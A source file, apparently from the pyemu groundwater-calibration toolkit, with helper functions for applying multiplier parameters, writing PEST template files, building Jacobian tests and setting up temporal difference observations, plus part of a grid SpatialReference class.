# pakspat = sum([True if fname in i else False for i in spat_df.filename])
# if pakspat:
# pak = spat_df.loc[spat_df.filename.str.contains(fname)].pak.values[0]
# else:
# pak = 'notHFB'
# except:
# pak = "notHFB"
names = None
if temp_df is not None and fname in temp_df.split_filename.values:
temp_df_fname = temp_df.loc[temp_df.split_filename == fname, :]
if temp_df_fname.shape[0] > 0:
names = temp_df_fname.dtype_names.iloc[0].split(',')
if spat_df is not None and fname in spat_df.split_filename.values:
spat_df_fname = spat_df.loc[spat_df.split_filename == fname, :]
if spat_df_fname.shape[0] > 0:
names = spat_df_fname.dtype_names.iloc[0].split(',')
if names is not None:
df_list = pd.read_csv(os.path.join(org_dir, fname),
delim_whitespace=True, header=None, names=names)
df_list.loc[:, "idx"] = df_list.apply(
lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k - 1, x.i - 1, x.j - 1), axis=1)
df_list.index = df_list.idx
pak_name = fname.split('_')[0].lower()
if pak_name in sp_mlts:
mlt_df = sp_mlts[pak_name]
mlt_df_ri = mlt_df.reindex(df_list.index)
for col in df_list.columns:
if col in ["k", "i", "j", "inode", 'irow1', 'icol1', 'irow2', 'icol2', 'idx']:
continue
if col in mlt_df.columns:
# print(mlt_df.loc[mlt_df.index.duplicated(),:])
# print(df_list.loc[df_list.index.duplicated(),:])
df_list.loc[:, col] *= mlt_df_ri.loc[:, col].values
if temp_df is not None and fname in temp_df.split_filename.values:
temp_df_fname = temp_df.loc[temp_df.split_filename == fname, :]
for col, val in zip(temp_df_fname.col, temp_df_fname.val):
df_list.loc[:, col] *= val
fmts = ''
for name in names:
if name in ["i", "j", "k", "inode", 'irow1', 'icol1', 'irow2', 'icol2']:
fmts += " %9d"
else:
fmts += " %9G"
np.savetxt(os.path.join(model_ext_path, fname), df_list.loc[:, names].values, fmt=fmts)
def apply_genericlist_pars(df):
""" a function to apply list style mult parameters
Args:
df (pandas.DataFrame): DataFrame that relates files containing
multipliers to model input file names. Required columns include:
{"model_file": file name of resulatant model input file,
"org_file": file name of original file that multipliers act on,
"fmt": format specifier for model input file
(currently on 'free' supported),
"sep": separator for model input file if 'free' formatted,
"head_rows": Number of header rows to transfer from orig file
to model file,
"index_cols": list of columns (either indexes or strings) to be
used to align mults, orig and model files,
"use_cols": columns to mults act on,
"upper_bound": ultimate upper bound for model input file
parameter,
"lower_bound": ultimate lower bound for model input file
parameter}
"""
uniq = df.model_file.unique()
for model_file in uniq:
print("processing model file:",model_file)
df_mf = df.loc[df.model_file == model_file, :].copy()
# read data stored in org (mults act on this)
org_file = df_mf.org_file.unique()
if org_file.shape[0] != 1:
raise Exception("wrong number of org_files for {0}".
format(model_file))
org_file = org_file[0]
print("org file:",org_file)
notfree = df_mf.fmt[df_mf.fmt != 'free']
if len(notfree) > 1:
raise Exception("too many different format specifiers for "
"model file: {0}".format(model_file))
elif len(notfree) == 1:
fmt = notfree.values[0]
else:
fmt = df_mf.fmt.values[-1]
if fmt == 'free':
if df_mf.sep.dropna().nunique() > 1:
raise Exception("too many different sep specifiers for "
"model file: {0}".format(model_file))
else:
sep = df_mf.sep.dropna().values[-1]
else:
sep = None
datastrtrow = df_mf.head_rows.values[-1]
if fmt.lower() == 'free' and sep == ' ':
delim_whitespace = True
if datastrtrow > 0:
with open(org_file, 'r') as fp:
storehead = [next(fp) for _ in range(datastrtrow)]
else:
storehead = []
# work out if headers are used for index_cols
index_col_eg = df_mf.index_cols.iloc[-1][0]
if isinstance(index_col_eg, str):
# TODO: add test for model file with headers
# index_cols can be from header str
header = 0
hheader=True
elif isinstance(index_col_eg, int):
# index_cols are column numbers in input file
header = None
hheader = None
# actually do need index cols to be list of strings
# to be compatible when the saved original file is read in.
df_mf.loc[:, 'index_cols'] = df_mf.index_cols.apply(
lambda x: [str(i) for i in x])
# if writen by PstFrom this should always be comma delim - tidy
org_data = pd.read_csv(org_file, skiprows=datastrtrow,
header=header)
# mult columns will be string type, so to make sure they align
org_data.columns = org_data.columns.astype(str)
print("org_data columns:",org_data.columns)
print("org_data shape:",org_data.shape)
new_df = org_data.copy()
for mlt in df_mf.itertuples():
try:
new_df = new_df.reset_index().rename(
columns={'index': 'oidx'}).set_index(mlt.index_cols)
new_df = new_df.sort_index()
except Exception as e:
print("error setting mlt index_cols: ",str(mlt.index_cols)," for new_df with cols: ",list(new_df.columns))
raise Exception("error setting mlt index_cols: "+str(e))
if not hasattr(mlt,"mlt_file") or pd.isna(mlt.mlt_file):
print("null mlt file for org_file '" + org_file + "', continuing...")
else:
mlts = pd.read_csv(mlt.mlt_file)
# get mult index to align with org_data,
# mult idxs will always be written zero based
# if original model files is not zero based need to add 1
add1 = int(mlt.zero_based == False)
mlts.index = pd.MultiIndex.from_tuples(mlts.sidx.apply(
lambda x: tuple(add1 + np.array(literal_eval(x)))),
names=mlt.index_cols)
if mlts.index.nlevels < 2: # just in case only one index col is used
mlts.index = mlts.index.get_level_values(0)
common_idx = new_df.index.intersection(
mlts.index).sort_values().drop_duplicates()
mlt_cols = [str(col) for col in mlt.use_cols]
new_df.loc[common_idx, mlt_cols] = (new_df.loc[common_idx, mlt_cols]
* mlts.loc[common_idx, mlt_cols]
).values
# bring mult index back to columns AND re-order
new_df = new_df.reset_index().set_index(
'oidx')[org_data.columns].sort_index()
if "upper_bound" in df.columns:
ub = df_mf.apply(
lambda x: pd.Series(
{str(c): b for c, b in
zip(x.use_cols, x.upper_bound)}), axis=1).max()
if ub.notnull().any():
for col, val in ub.items():
new_df.loc[new_df.loc[:, col] > val, col] = val
if "lower_bound" in df.columns:
lb = df_mf.apply(
lambda x: pd.Series(
{str(c): b for c, b in
zip(x.use_cols, x.lower_bound)}), axis=1).min()
if lb.notnull().any():
for col, val in lb.items():
new_df.loc[new_df.loc[:, col] < val, col] = val
with open(model_file, 'w') as fo:
kwargs = {}
if "win" in platform.platform().lower():
kwargs = {"line_terminator": "\n"}
if len(storehead) != 0:
fo.write('\n'.join(storehead))
fo.flush()
if fmt.lower() == 'free':
new_df.to_csv(fo, index=False, mode='a',
sep=sep, header=hheader,
**kwargs)
else:
np.savetxt(fo, np.atleast_2d(new_df.values), fmt=fmt)
def write_const_tpl(name, tpl_file, suffix, zn_array=None,
shape=None, longnames=False):
""" write a constant (uniform) template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write
zn_array (`numpy.ndarray`, optional): an array used to skip inactive cells,
and optionally get shape info.
shape (`tuple`): tuple nrow and ncol. Either `zn_array` or `shape`
must be passed
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme = []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = " 1.0 "
else:
if longnames:
pname = "const_{0}_{1}".format(name, suffix)
else:
pname = "{0}{1}".format(name, suffix)
if len(pname) > 12:
warnings.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
# df.loc[:,"pargp"] = "{0}{1}".format(self.cn_suffixname)
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
def write_grid_tpl(name, tpl_file, suffix, zn_array=None, shape=None,
spatial_reference=None, longnames=False):
""" write a grid-based template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write - include path
zn_array (`numpy.ndarray`, optional): zone array to identify
inactive cells. Default is None
shape (`tuple`, optional): a length-two tuple of nrow and ncol. Either
`zn_array` or `shape` must be passed.
spatial_reference (`flopy.utils.SpatialReference`): a spatial reference instance.
If `longnames` is True, then `spatial_reference` is used to add spatial info
to the parameter names.
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme, x, y = [], [], []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = ' 1.0 '
else:
if longnames:
pname = "{0}_i:{0}_j:{1}_{2}".format(name, i, j, suffix)
if spatial_reference is not None:
pname += "_x:{0:10.2E}_y:{1:10.2E}".format(
spatial_reference.xcentergrid[i,j],
spatial_reference.ycentergrid[i,j])
else:
pname = "{0}{1:03d}{2:03d}".format(name, i, j)
if len(pname) > 12:
warnings.warn("grid pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = ' ~ {0} ~ '.format(pname)
if spatial_reference is not None:
x.append(spatial_reference.xcentergrid[i, j])
y.append(spatial_reference.ycentergrid[i, j])
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
if spatial_reference is not None:
df.loc[:, 'x'] = x
df.loc[:, 'y'] = y
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
def write_zone_tpl(name, tpl_file, suffix="", zn_array=None, shape=None,
longnames=False,fill_value="1.0"):
""" write a zone-based template file for a 2-D array
Args:
name (`str`): the base parameter name
tpl_file (`str`): the template file to write
suffix (`str`): suffix to add to parameter names. Only used if `longnames=True`
zn_array (`numpy.ndarray`, optional): an array used to skip inactive cells,
and optionally get shape info. zn_array values less than 1 are given `fill_value`
shape (`tuple`): tuple nrow and ncol. Either `zn_array` or `shape`
must be passed
longnames (`bool`): flag to use longer names that exceed 12 chars in length.
Default is False.
fill_value (`str`): value to fill locations where `zn_array` is less than 1.0.
Default is "1.0".
Returns:
`pandas.DataFrame`: a dataframe with parameter information
"""
if shape is None and zn_array is None:
raise Exception("must pass either zn_array or shape")
elif shape is None:
shape = zn_array.shape
parnme = []
zone = []
with open(tpl_file, 'w') as f:
f.write("ptf ~\n")
for i in range(shape[0]):
for j in range(shape[1]):
if zn_array is not None and zn_array[i, j] < 1:
pname = " {0} ".format(fill_value)
else:
zval = 1
if zn_array is not None:
zval = zn_array[i, j]
if longnames:
pname = "{0}_zone:{1}_{2}".format(name, zval, suffix)
else:
pname = "{0}_zn{1}".format(name, zval)
if len(pname) > 12:
warnings.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
zone.append(zval)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme,"zone":zone}, index=parnme)
df.loc[:, "pargp"] = "{0}_{1}".format(suffix.replace("_", ''), name)
return df
def build_jac_test_csv(pst, num_steps, par_names=None, forward=True):
""" build a dataframe of jactest inputs for use with sweep
Args:
pst (`pyemu.Pst`): existing control file
num_steps (`int`): number of pertubation steps for each parameter
par_names [`str`]: list of parameter names of pars to test.
If None, all adjustable pars are used. Default is None
forward (`bool`): flag to start with forward pertubations.
Default is True
Returns:
`pandas.DataFrame`: the sequence of model runs to evaluate
for the jactesting.
"""
if isinstance(pst, str):
pst = pyemu.Pst(pst)
# pst.add_transform_columns()
pst.build_increments()
incr = pst.parameter_data.increment.to_dict()
irow = 0
par = pst.parameter_data
if par_names is None:
par_names = pst.adj_par_names
total_runs = num_steps * len(par_names) + 1
idx = ["base"]
for par_name in par_names:
idx.extend(["{0}_{1}".format(par_name, i) for i in range(num_steps)])
df = pd.DataFrame(index=idx, columns=pst.par_names)
li = par.partrans == "log"
lbnd = par.parlbnd.copy()
ubnd = par.parubnd.copy()
lbnd.loc[li] = lbnd.loc[li].apply(np.log10)
ubnd.loc[li] = ubnd.loc[li].apply(np.log10)
lbnd = lbnd.to_dict()
ubnd = ubnd.to_dict()
org_vals = par.parval1.copy()
org_vals.loc[li] = org_vals.loc[li].apply(np.log10)
if forward:
sign = 1.0
else:
sign = -1.0
# base case goes in as first row, no perturbations
df.loc["base", pst.par_names] = par.parval1.copy()
irow = 1
full_names = ["base"]
for jcol, par_name in enumerate(par_names):
org_val = org_vals.loc[par_name]
last_val = org_val
for step in range(num_steps):
vals = org_vals.copy()
i = incr[par_name]
val = last_val + (sign * incr[par_name])
if val > ubnd[par_name]:
sign = -1.0
val = org_val + (sign * incr[par_name])
if val < lbnd[par_name]:
raise Exception("parameter {0} went out of bounds".
format(par_name))
elif val < lbnd[par_name]:
sign = 1.0
val = org_val + (sign * incr[par_name])
if val > ubnd[par_name]:
raise Exception("parameter {0} went out of bounds".
format(par_name))
vals.loc[par_name] = val
vals.loc[li] = 10 ** vals.loc[li]
df.loc[idx[irow], pst.par_names] = vals
full_names.append("{0}_{1:<15.6E}".format(par_name, vals.loc[par_name]).strip())
irow += 1
last_val = val
df.index = full_names
return df
def _write_df_tpl(filename, df, sep=',', tpl_marker='~', **kwargs):
"""function write a pandas dataframe to a template file.
"""
if "line_terminator" not in kwargs:
if "win" in platform.platform().lower():
kwargs["line_terminator"] = "\n"
with open(filename, 'w') as f:
f.write("ptf {0}\n".format(tpl_marker))
f.flush()
df.to_csv(f, sep=sep, mode='a', **kwargs)
def setup_fake_forward_run(pst, new_pst_name, org_cwd='.', bak_suffix="._bak", new_cwd='.'):
"""setup a fake forward run for a pst.
Args:
pst (`pyemu.Pst`): existing control file
new_pst_name (`str`): new control file to write
org_cwd (`str`): existing working dir. Default is "."
bak_suffix (`str`, optional): suffix to add to existing
model output files when making backup copies.
new_cwd (`str`): new working dir. Default is ".".
Note:
The fake forward run simply copies existing backup versions of
model output files to the outfiles pest(pp) is looking
for. This is really a development option for debugging
PEST++ issues.
"""
if new_cwd != org_cwd and not os.path.exists(new_cwd):
os.mkdir(new_cwd)
pairs = {}
for output_file in pst.output_files:
org_pth = os.path.join(org_cwd, output_file)
new_pth = os.path.join(new_cwd, os.path.split(output_file)[-1])
assert os.path.exists(org_pth), org_pth
shutil.copy2(org_pth, new_pth + bak_suffix)
pairs[output_file] = os.path.split(output_file)[-1] + bak_suffix
if new_cwd != org_cwd:
for files in [pst.template_files, pst.instruction_files]:
for f in files:
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
org_pth = os.path.join(org_cwd, f)
new_pth = os.path.join(new_cwd, f)
assert os.path.exists(org_pth), org_pth
shutil.copy2(org_pth, new_pth)
for f in pst.input_files:
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
for key, f in pst.pestpp_options.items():
if not isinstance(f, str):
continue
raw = os.path.split(f)
if len(raw[0]) == 0:
raw = raw[1:]
if len(raw) > 1:
pth = os.path.join(*raw[:-1])
pth = os.path.join(new_cwd, pth)
if not os.path.exists(pth):
os.makedirs(pth)
org_pth = os.path.join(org_cwd, f)
new_pth = os.path.join(new_cwd, f)
if os.path.exists(org_pth):
shutil.copy2(org_pth, new_pth)
with open(os.path.join(new_cwd, "fake_forward_run.py"), 'w') as f:
f.write("import os\nimport shutil\n")
for org, bak in pairs.items():
f.write("shutil.copy2(r'{0}',r'{1}')\n".format(bak, org))
pst.model_command = "python fake_forward_run.py"
pst.write(os.path.join(new_cwd, new_pst_name))
return pst
def setup_temporal_diff_obs(pst, ins_file, out_file=None,
include_zero_weight=False, include_path=False,
sort_by_name=True,long_names=True,
prefix="dif"):
""" a helper function to setup difference-in-time observations based on an existing
set of observations in an instruction file using the observation grouping in the
control file
Args:
pst (`pyemu.Pst`): existing control file
ins_file (`str`): an existing instruction file
out_file (`str`, optional): an existing model output file that corresponds to
the instruction file. If None, `ins_file.replace(".ins","")` is used
include_zero_weight (`bool`, optional): flag to include zero-weighted observations
in the difference observation process. Default is False so that only non-zero
weighted observations are used.
include_path (`bool`, optional): flag to setup the binary file processing in directory where the hds_file
is located (if different from where python is running). This is useful for setting up
the process in separate directory for where python is running.
sort_by_name (`bool`,optional): flag to sort observation names in each group prior to setting up
the differencing. The order of the observations matters for the differencing. If False, then
the control file order is used. If observation names have a datetime suffix, make sure the format is
year-month-day to use this sorting. Default is True
long_names (`bool`, optional): flag to use long, descriptive names by concating the two observation names
that are being differenced. This will produce names that are too long for tradtional PEST(_HP).
Default is True.
prefix (`str`, optional): prefix to prepend to observation names and group names. Default is "dif".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
this is the companion function of `helpers.apply_temporal_diff_obs()`.
"""
if not os.path.exists(ins_file):
raise Exception("setup_temporal_diff_obs() error: ins_file '{0}' not found". \
format(ins_file))
# the ins routines will check for missing obs, etc
try:
ins = pyemu.pst_utils.InstructionFile(ins_file, pst)
except Exception as e:
raise Exception("setup_temporal_diff_obs(): error processing instruction file: {0}". \
format(str(e)))
if out_file is None:
out_file = ins_file.replace(".ins", "")
# find obs groups from the obs names in the ins that have more than one observation
# (cant diff single entry groups)
obs = pst.observation_data
if include_zero_weight:
group_vc = pst.observation_data.loc[ins.obs_name_set, "obgnme"].value_counts()
else:
group_vc = obs.loc[obs.apply(lambda x: x.weight > 0 and \
x.obsnme in ins.obs_name_set, axis=1),\
"obgnme"].value_counts()
groups = list(group_vc.loc[group_vc > 1].index)
if len(groups) == 0:
raise Exception("setup_temporal_diff_obs() error: no obs groups found " +
"with more than one non-zero weighted obs")
# process each group
diff_dfs = []
for group in groups:
# get a sub dataframe with non-zero weighted obs that are in this group and in the instruction file
obs_group = obs.loc[obs.obgnme == group,:].copy()
obs_group = obs_group.loc[obs_group.apply(lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set,axis=1),:]
# sort if requested
if sort_by_name:
obs_group = obs_group.sort_values(by="obsnme",ascending=True)
# the names starting with the first
diff1 = obs_group.obsnme[:-1].values
# the names ending with the last
diff2 = obs_group.obsnme[1:].values
# form a dataframe
diff_df = pd.DataFrame({"diff1":diff1,"diff2":diff2})
#build up some obs names
if long_names:
diff_df.loc[:,"obsnme"] = ["{0}_{1}__{2}".format(prefix,d1,d2) for d1,d2 in zip(diff1,diff2)]
else:
diff_df.loc[:,"obsnme"] = ["{0}_{1}_{2}".format(prefix,group,c) for c in len(diff1)]
# set the obs names as the index (per usual)
diff_df.index = diff_df.obsnme
# set the group name for the diff obs
diff_df.loc[:,"obgnme"] = "{0}_{1}".format(prefix,group)
# set the weights using the standard prop of variance formula
d1_std,d2_std = 1./obs_group.weight[:-1].values,1./obs_group.weight[1:].values
diff_df.loc[:,"weight"] = 1./(np.sqrt((d1_std**2)+(d2_std**2)))
diff_dfs.append(diff_df)
# concat all the diff dataframes
diff_df = pd.concat(diff_dfs)
#save the dataframe as a config file
config_file = ins_file.replace(".ins",".diff.config")
f = open(config_file, 'w')
if include_path:
#ins_path = os.path.split(ins_file)[0]
#f = open(os.path.join(ins_path,config_file),'w')
f.write("{0},{1}\n".format(os.path.split(ins_file)[-1],os.path.split(out_file)[-1]))
#diff_df.to_csv(os.path.join(ins_path,config_file))
else:
f.write("{0},{1}\n".format(ins_file,out_file))
#diff_df.to_csv(os.path.join(config_file))
f.flush()
diff_df.to_csv(f,mode="a")
f.flush()
f.close()
# write the instruction file
diff_ins_file = config_file.replace(".config", ".processed.ins")
with open(diff_ins_file, 'w') as f:
f.write("pif ~\n")
f.write("l1 \n")
for oname in diff_df.obsnme:
f.write("l1 w w w !{0}! \n".format(oname))
if include_path:
config_file = os.path.split(config_file)[-1]
diff_ins_file = os.path.split(diff_ins_file)[-1]
# if the corresponding output file exists, try to run the routine
if os.path.exists(out_file):
if include_path:
b_d = os.getcwd()
ins_path = os.path.split(ins_file)[0]
os.chdir(ins_path)
# try:
processed_df = apply_temporal_diff_obs(config_file=config_file)
# except Exception as e:
# if include_path:
# os.chdir(b_d)
#
# ok, now we can use the new instruction file to process the diff outputs
ins = pyemu.pst_utils.InstructionFile(diff_ins_file)
ins_pro_diff_df = ins.read_output_file(diff_ins_file.replace(".ins",""))
if include_path:
os.chdir(b_d)
print(ins_pro_diff_df)
diff_df.loc[ins_pro_diff_df.index,"obsval"] = ins_pro_diff_df.obsval
frun_line = "pyemu.helpers.apply_temporal_diff_obs('{0}')\n".format(config_file)
return frun_line,diff_df
def apply_temporal_diff_obs(config_file):
"""process an instruction-output file pair and formulate difference observations.
Args:
config_file (`str`): configuration file written by `pyemu.helpers.setup_temporal_diff_obs`.
Returns:
diff_df (`pandas.DataFrame`) : processed difference observations
Note:
writes `config_file.replace(".config",".processed")` output file that can be read
with the instruction file that is created by `pyemu.helpers.setup_temporal_diff_obs()`.
this is the companion function of `helpers.setup_setup_temporal_diff_obs()`.
"""
if not os.path.exists(config_file):
raise Exception("apply_temporal_diff_obs() error: config_file '{0}' not found".format(config_file))
with open(config_file,'r') as f:
line = f.readline().strip().split(',')
ins_file,out_file = line[0],line[1]
diff_df = pd.read_csv(f)
if not os.path.exists(out_file):
raise Exception("apply_temporal_diff_obs() error: out_file '{0}' not found".format(out_file))
if not os.path.exists(ins_file):
raise Exception("apply_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file))
try:
ins = pyemu.pst_utils.InstructionFile(ins_file)
except Exception as e:
raise Exception("apply_temporal_diff_obs() error instantiating ins file: {0}".format(str(e)))
try:
out_df = ins.read_output_file(out_file)
except Exception as e:
raise Exception("apply_temporal_diff_obs() error processing ins-out file pair: {0}".format(str(e)))
#make sure all the listed obs names in the diff_df are in the out_df
diff_names = set(diff_df.diff1.to_list())
diff_names.update(set(diff_df.diff2.to_list()))
missing = diff_names - set(list(out_df.index.values))
if len(missing) > 0:
raise Exception("apply_temporal_diff_obs() error: the following obs names in the config file "+\
"are not in the instruction file processed outputs :" + ",".join(missing))
diff_df.loc[:,"diff1_obsval"] = out_df.loc[diff_df.diff1.values,"obsval"].values
diff_df.loc[:, "diff2_obsval"] = out_df.loc[diff_df.diff2.values, "obsval"].values
diff_df.loc[:,"diff_obsval"] = diff_df.diff1_obsval - diff_df.diff2_obsval
processed_name = config_file.replace(".config",".processed")
diff_df.loc[:, ["obsnme","diff1_obsval", "diff2_obsval", "diff_obsval"]].\
to_csv(processed_name,sep=' ',index=False)
return diff_df
# web address of spatial reference dot org
srefhttp = 'https://spatialreference.org'
class SpatialReference(object):
"""
a class to locate a structured model grid in x-y space.
Lifted wholesale from Flopy, and preserved here...
...maybe slighlty over-engineered for here
Parameters
----------
delr : numpy ndarray
the model discretization delr vector
(An array of spacings along a row)
delc : numpy ndarray
the model discretization delc vector
(An array of spacings along a column)
lenuni : int
the length units flag from the discretization package
(default 2)
xul : float
the x coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
yul : float
the y coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
xll : float
the x coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
yll : float
the y coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
rotation : float
the counter-clockwise rotation (in degrees) of the grid
proj4_str: str
a PROJ4 string that identifies the grid in space. warning: case
sensitive!
units : string
Units for the grid. Must be either feet or meters
epsg : int
EPSG code that identifies the grid in space. Can be used in lieu of
proj4. PROJ4 attribute will auto-populate if there is an internet
connection(via get_proj4 method).
See https://www.epsg-registry.org/ or spatialreference.org
length_multiplier : float
multiplier to convert model units to spatial reference units.
delr and delc above will be multiplied by this value. (default=1.)
Attributes
----------
xedge : ndarray
array of column edges
yedge : ndarray
array of row edges
xgrid : ndarray
numpy meshgrid of xedges
ygrid : ndarray
numpy meshgrid of yedges
xcenter : ndarray
array of column centers
ycenter : ndarray
array of row centers
xcentergrid : ndarray
numpy meshgrid of column centers
ycentergrid : ndarray
numpy meshgrid of row centers
vertices : 1D array
1D array of cell vertices for whole grid in C-style (row-major) order
(same as np.ravel())
Notes
-----
xul and yul can be explicitly (re)set after SpatialReference
instantiation, but only before any of the other attributes and methods are
accessed
"""
xul, yul = None, None
xll, yll = None, None
rotation = 0.
length_multiplier = 1.
origin_loc = 'ul' # or ll
defaults = {"xul": None, "yul": None, "rotation": 0.,
"proj4_str": None,
"units": None, "lenuni": 2,
"length_multiplier": None,
"source": 'defaults'}
lenuni_values = {'undefined': 0,
'feet': 1,
'meters': 2,
'centimeters': 3}
lenuni_text = {v: k for k, v in lenuni_values.items()}
def __init__(self, delr=np.array([]), delc=np.array([]), lenuni=2,
xul=None, yul=None, xll=None, yll=None, rotation=0.0,
proj4_str=None, epsg=None, prj=None, units=None,
length_multiplier=None, source=None):
for delrc in [delr, delc]:
if isinstance(delrc, float) or isinstance(delrc, int):
msg = ('delr and delcs must be an array or sequences equal in '
'length to the number of rows/columns.')
raise TypeError(msg)
self.delc = np.atleast_1d(np.array(delc)).astype(
np.float64) # * length_multiplier
self.delr = np.atleast_1d(np.array(delr)).astype(
np.float64) # * length_multiplier
if self.delr.sum() == 0 or self.delc.sum() == 0:
if xll is None or yll is None:
msg = ('Warning: no grid spacing. '
'Lower-left corner offset calculation methods requires '
'arguments for delr and delc. Origin will be set to '
'upper-left')
warnings.warn(msg, PyemuWarning)
xll, yll = None, None
# xul, yul = None, None
self._lenuni = lenuni
self._proj4_str = proj4_str
#
self._epsg = epsg
# if epsg is not None:
# self._proj4_str = getproj4(self._epsg)
# self.prj = prj
# self._wkt = None
# self.crs = CRS(prj=prj, epsg=epsg)
self.supported_units = ["feet", "meters"]
self._units = units
self._length_multiplier = length_multiplier
self._reset()
self.set_spatialreference(xul, yul, xll, yll, rotation)
@property
def xll(self):
if self.origin_loc == 'll':
xll = self._xll if self._xll is not None else 0.
elif self.origin_loc == 'ul':
# calculate coords for lower left corner
xll = self._xul - (np.sin(self.theta) * self.yedge[0] *
self.length_multiplier)
return xll
@property
def yll(self):
if self.origin_loc == 'll':
yll = self._yll if self._yll is not None else 0.
elif self.origin_loc == 'ul':
# calculate coords for lower left corner
yll = self._yul - (np.cos(self.theta) * self.yedge[0] *
self.length_multiplier)
return yll
@property
def xul(self):
if self.origin_loc == 'll':
# calculate coords for upper left corner
xul = self._xll + (np.sin(self.theta) * self.yedge[0] *
self.length_multiplier)
if self.origin_loc == 'ul':
# calculate coords for lower left corner
xul = self._xul if self._xul is not None else 0.
return xul
@property
def yul(self):
if self.origin_loc == 'll':
# calculate coords for upper left corner
yul = self._yll + (np.cos(self.theta) * self.yedge[0] *
self.length_multiplier)
if self.origin_loc == 'ul':
# calculate coords for lower left corner
yul = self._yul if self._yul is not None else 0.
return yul
@property
def proj4_str(self):
proj4_str = None
if self._proj4_str is not None:
if "epsg" in self._proj4_str.lower():
if "init" not in self._proj4_str.lower():
proj4_str = "+init=" + self._proj4_str
else:
proj4_str = self._proj4_str
# set the epsg if proj4 specifies it
tmp = [i for i in self._proj4_str.split() if
'epsg' in i.lower()]
self._epsg = int(tmp[0].split(':')[1])
else:
proj4_str = self._proj4_str
elif self.epsg is not None:
proj4_str = '+init=epsg:{}'.format(self.epsg)
return proj4_str
@property
def epsg(self):
# don't reset the proj4 string here
# because proj4 attribute may already be populated
# (with more details than getprj would return)
# instead reset proj4 when epsg is set
# (on init or setattr)
return self._epsg
# @property
# def wkt(self):
# if self._wkt is None:
# if self.prj is not None:
# with open(self.prj) as src:
# wkt = src.read()
# elif self.epsg is not None:
# wkt = getprj(self.epsg)
# else:
# return None
# return wkt
# else:
# return self._wkt
@property
def lenuni(self):
return self._lenuni
def _parse_units_from_proj4(self):
units = None
try:
# need this because preserve_units doesn't seem to be
# working for complex proj4 strings. So if an
# epsg code was passed, we have no choice, but if a
# proj4 string was passed, we can just parse it
proj_str = self.proj4_str
# if "EPSG" in self.proj4_str.upper():
# import pyproj
#
# crs = pyproj.Proj(self.proj4_str,
# preserve_units=True,
# errcheck=True)
# proj_str = crs.srs
# else:
# proj_str = self.proj4_str
# http://proj4.org/parameters.html#units
# from proj4 source code
# "us-ft", "0.304800609601219", "U.S. Surveyor's Foot",
# "ft", "0.3048", "International Foot",
if "units=m" in proj_str:
units = "meters"
elif "units=ft" in proj_str or \
"units=us-ft" in proj_str or \
"to_meters:0.3048" in proj_str:
units = "feet"
return units
except:
if self.proj4_str is not None:
print(' could not parse units from {}'.format(
self.proj4_str))
@property
def units(self):
if self._units is not None:
units = self._units.lower()
else:
units = self._parse_units_from_proj4()
if units is None:
# print("warning: assuming SpatialReference units are meters")
units = 'meters'
assert units in self.supported_units
return units
@property
def length_multiplier(self):
"""
Attempt to identify multiplier for converting from
model units to sr units, defaulting to 1.
"""
lm = None
if self._length_multiplier is not None:
lm = self._length_multiplier
else:
if self.model_length_units == 'feet':
if self.units == 'meters':
lm = 0.3048
elif self.units == 'feet':
lm = 1.
elif self.model_length_units == 'meters':
if self.units == 'feet':
lm = 1 / .3048
elif self.units == 'meters':
lm = 1.
elif self.model_length_units == 'centimeters':
if self.units == 'meters':
lm = 1 / 100.
elif self.units == 'feet':
lm = 1 / 30.48
else: # model units unspecified; default to 1
lm = 1.
return lm
@property
def model_length_units(self):
return self.lenuni_text[self.lenuni]
@property
def bounds(self):
"""
Return bounding box in shapely order.
"""
xmin, xmax, ymin, ymax = self.get_extent()
return xmin, ymin, xmax, ymax
@staticmethod
def load(namefile=None, reffile='usgs.model.reference'):
"""
Attempts to load spatial reference information from
the following files (in order):
1) usgs.model.reference
2) NAM file (header comment)
3) SpatialReference.default dictionary
"""
reffile = os.path.join(os.path.split(namefile)[0], reffile)
d = SpatialReference.read_usgs_model_reference_file(reffile)
if d is not None:
return d
